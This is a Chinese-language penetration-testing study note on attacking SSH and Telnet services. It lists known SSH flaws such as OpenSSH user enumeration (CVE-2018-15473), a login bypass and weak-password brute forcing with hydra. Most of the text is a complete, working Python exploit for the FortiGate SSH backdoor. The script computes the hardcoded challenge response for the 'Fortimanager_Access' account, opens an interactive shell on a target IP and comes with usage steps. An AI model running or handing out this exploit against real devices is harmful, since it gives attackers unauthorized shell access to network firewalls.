端口与服务2

ssh

1.搭建  linux自带

2.经典漏洞

2.1防火墙ssh后门:https://www.secpulse.com/archives/69093.html
2.2 28退格 输入账号时,连续28下退格键 https://www.ithome.com/html/it/195990.htm
2.3 openssh 用户枚举 CVE-2018-15473。（https://www.anquanke.com/post/id/157607）
总结:1poc下载http://www.openwall.com/lists/oss-security/2018/08/16/1
2执行 ssh-check-username.py 192.168.8.103 存在的用户名
3返回结果
4.执行 ssh-check-username.py 192.168.8.103 不存在的用户名
5.返回结果
6.原理

2.4 鹏博士宽带FortiGate防火墙存在SSH后门（附脚本）
总结:1.matt牛的脚本
#!/usr/bin/env python

# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

# Usage: ./fgt_ssh_backdoor.py <target-ip>

 

import socket

import select

import sys

import paramiko

from paramiko.py3compat import u

import base64

import hashlib

import termios

import tty

 

def custom_handler(title, instructions, prompt_list):

n = prompt_list[0][0]

m = hashlib.sha1()

m.update('\x00' * 12)

m.update(n + 'FGTAbc11*xy+Qqz27')

m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')

h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())

return [h]

 

 

def main():

if len(sys.argv) < 2:

print 'Usage: ' + sys.argv[0] + ' <target-ip>'

exit(-1)

 

client = paramiko.SSHClient()

client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

 

try:

client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)

except paramiko.ssh_exception.SSHException:

pass

 

trans = client.get_transport()

try:

trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)

except paramiko.ssh_exception.AuthenticationException:

pass

 

trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)

chan = client.invoke_shell()

 

oldtty = termios.tcgetattr(sys.stdin)

try:

tty.setraw(sys.stdin.fileno())

tty.setcbreak(sys.stdin.fileno())

chan.settimeout(0.0)

 

while True:

r, w, e = select.select([chan, sys.stdin], [], [])

if chan in r:

try:

x = u(chan.recv(1024))

if len(x) == 0:

sys.stdout.write('\r\n*** EOF\r\n')

break

sys.stdout.write(x)

sys.stdout.flush()

except socket.timeout:

pass

if sys.stdin in r:

x = sys.stdin.read(1)

if len(x) == 0:

break

chan.send(x)

 

finally:

termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)

 

 

if __name__ == '__main__':

main()
2python FortiGate.py ip
3.执行操作

3攻击方式

3.1 弱口令 hydra猜解

3.2 防火墙SSH后门

3.3 28退格

3.4 openssh 用户枚举 CVE-2018-15473

telent

攻击方式 1.弱口令 hydra

              2. cain嗅探

参考链接:https://mp.weixin.qq.com/s/Tg1-puJFgztNqtY9KoMeog